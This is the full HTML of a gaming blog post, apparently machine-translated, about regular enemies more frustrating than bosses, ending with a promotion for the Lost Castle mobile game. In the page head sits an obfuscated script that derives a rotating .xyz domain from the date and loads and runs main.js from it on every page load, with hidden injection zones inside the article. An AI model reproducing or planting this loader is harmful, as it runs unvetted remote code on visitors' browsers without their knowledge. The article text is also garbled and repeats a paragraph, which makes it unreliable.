<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="A lot of players will have so many scary bosses in their mind. It forces you to consume a lot of recovery items, and even close them several times before you finally kill them.But do you think the onl">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="A lot of players will have so many scary bosses in their mind. It forces you to consume a lot of recovery items, and even close them several times before you finally kill them.But do you think the onl">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/38d0881d2d59417eae1e25e6fd7d29fc.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/132629ec355642e8af8a93a0ad97acd2.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/5af68b9116e4417d9b2ac7498985f33b.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/f5b60b0ffba2469d863a66128682b715.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/b122cf14fe964586ad0a605b3153dc40.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/1d92479810204b58823b385a7abf8d6f.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/ca8bed962f084e4c8dac8dcf4b28d206.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/4be23591096347aaa9dfc46ea84a913c.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/d693ad53360b4aa59c097a96a0f724aa.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/a85d990a2f794ec3bd07d8d30046be24.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/462e367776224fe29e22a15f699f0348.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/2b04eab5b3f14346ae10d17c3dfcf360.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/04f9f19d82964d9eae0c39b0da35e7b3.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/11b1a625d433496f9aedc57d6c58469e.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/56b2b6615c5e47eca6669808c33f4ba0.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:48.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village">
<meta name="twitter:description" content="A lot of players will have so many scary bosses in their mind. It forces you to consume a lot of recovery items, and even close them several times before you finally kill them.But do you think the onl">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/38d0881d2d59417eae1e25e6fd7d29fc.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Count the players in the game world! It's more terrible than boss. The worst one is in the novice village | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Count the players in the game world! It's more terrible than boss. The worst one is in the novice village</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>A lot of players will have so many scary bosses in their mind. It forces you to consume a lot of recovery items, and even close them several times before you finally kill them.<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/38d0881d2d59417eae1e25e6fd7d29fc.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>But do you think the only thing that brings people psychological shadow is boss level? In fact, in the history of the game, some of the game’s miscellaneous soldiers, the level of terror than boss is even more desperate! And these terror soldiers, in your and my game career, may have met!<br>From the era of red and white machines, this kind of enemies are everywhere, showing the full disgust of game makers! Ask a question, what’s the most terrible enemy when you play the early devil city?<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/132629ec355642e8af8a93a0ad97acd2.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>Is it a science geek? Death? Or Count Dracula?<br>Both! No Yes!<br>The most terrible enemy of devil city is Medusa head!<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/5af68b9116e4417d9b2ac7498985f33b.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>When this kind of flying little monster constantly appears, you have no way to take it. If you are in the stairs, you will be closer to death! What’s more, it’s infinitely refreshed. Only if it doesn’t move on, it will never stop bothering you until you collapse!<br>Out of the age of red and white machines, there are also more disgusting acrobats than boss in the age of arcade. For example, Andrew in “fight against the whirlwind”, who has super high blood volume, high-speed collision, plum blossom sitting, and suppressive skills. Every time he meets him, he has a sense of continuity<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/f5b60b0ffba2469d863a66128682b715.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>In addition, there are the armor soldiers of “transforming Ninja”. When they first appeared, it was hard to fight with bare hands. The second time, they even took a knife, and they would release the dragon. If they were caught by it, they would suffer a lot<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/b122cf14fe964586ad0a605b3153dc40.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>Today, there are many more difficult soldiers than boss. The most typical one is the soldiers in soul of darkness, who can suppress remotely, block and stab on the back Before challenging boss, it’s common to be killed hundreds of times in the barracks.<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/1d92479810204b58823b385a7abf8d6f.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>Sometimes, the worst enemy may be your best friend. For example, as your best partner in legend, the skull brother sans will incarnate as a justice Punisher and teach you what is “love” at the end of your crimes That kind of desperation, only those who have played understand!<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/ca8bed962f084e4c8dac8dcf4b28d206.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>However, when it comes to the most desperate and unexpected enemy in the history of the game, it’s not a dragon with venom, a headless knight wielding a huge sword, or a monster with huge size<br>Unexpectedly… It’s a chicken.<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/4be23591096347aaa9dfc46ea84a913c.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>In the dinner table, chicken is a healthy and delicious food; in the game, chicken is a strong enemy calling for death.<br>Play ancient scroll 5, you can offend the wicked, but not the chicken God! When you see a harmless chicken in Ximu Town, a novice village, if you dare to hurt it, you will not only be chased and killed by the whole village, but also be wanted all over the world. You will be regarded as a street mouse. You will be killed once<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/d693ad53360b4aa59c097a96a0f724aa.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>Similarly, in the legend of Zelda series, you’d better not provoke these chickens, otherwise, a big wave without blood bars can’t be killed, and it can kill your rooster army will kill you<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/a85d990a2f794ec3bd07d8d30046be24.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>Similarly, in the legend of Zelda series, you’d better not provoke these chickens, otherwise, a big wave without blood bars can’t be killed, and it can kill your rooster army will kill you<br>In fact, the most disgusting thing for Xiaobian is not those enemies with fancy moves, but the purer the attack mode is, the rougher the enemies are, for example, the red devil in demon village.<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/462e367776224fe29e22a15f699f0348.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>Medusa is a younger brother than the red devil. As one of the most difficult horizontal action games in the age of red and white machines, the magic village was a place where countless players were pressed on the ground to rub against each other. There were many people who couldn’t even pass the first pass. Many of them knelt in front of the devil.<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/2b04eab5b3f14346ae10d17c3dfcf360.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>As long as the red devil is near, it will fly up, and constantly make dive attacks, at the same time, it will release bullets to attack the players. Its action is flexible and its angle is tricky, which can be called a childhood nightmare! The most terrible thing is that the red devil will never let you go. It will keep chasing you. The only way to get rid of it is to kill it, or it will kill you I once thought it was the ultimate boss<br>Recently, I once again experienced that I was dominated by the red devil in the Lost Castle tour Lost Castle: there is a bone dragon in a room of the fifth pass of the mobile tour. Its attack is to rush all the time. It seems simple, but it is a great threat. If you don’t wear apples and bananas and grind with it slowly, you will almost die here<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/04f9f19d82964d9eae0c39b0da35e7b3.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>Lost Castle mobile games are very difficult to master. The players in the game have a high IQ and are very cunning. With the help of the traps, novices are often dissuaded in 5 minutes Fortunately, after each game over, the souls collected by players will be preserved and can be sacrificed to demons to strengthen skills. The next challenge will win even more!<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/11b1a625d433496f9aedc57d6c58469e.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>If you can’t handle these strange things with a single brush, the Lost Castle mobile game also provides the online function of four people to team up with friends for strategy, as if it’s back to the happy time of playing games with friends in the arcade hall. However, it must be noted that the Lost Castle mobile game has a large number of random elements. Sometimes these random elements can be deceiving and mismatching. Minutes are faster than single brush<br><img src="http://maiygu.xyz/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/56b2b6615c5e47eca6669808c33f4ba0.jpg" alt="Count the players in the game world! It&#39;s more terrible than boss. The worst one is in the novice village"><br>Of course, the boss war of Lost Castle mobile game is also very hard core. All kinds of super giant boss give players the most intense sense of tension and stimulation. After defeating boss, they can get rich rewards! If you like to challenge high difficulty players, it is recommended to try this game!</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/" rel="next" title="Cat and mouse is probably the favorite CP of all childhood">
                <i class="fa fa-chevron-left"></i> Cat and mouse is probably the favorite CP of all childhood
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/Can players accept the game manufacturer's mending the past/" rel="prev" title="Can players accept the game manufacturer's mending the past">
                Can players accept the game manufacturer's mending the past <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
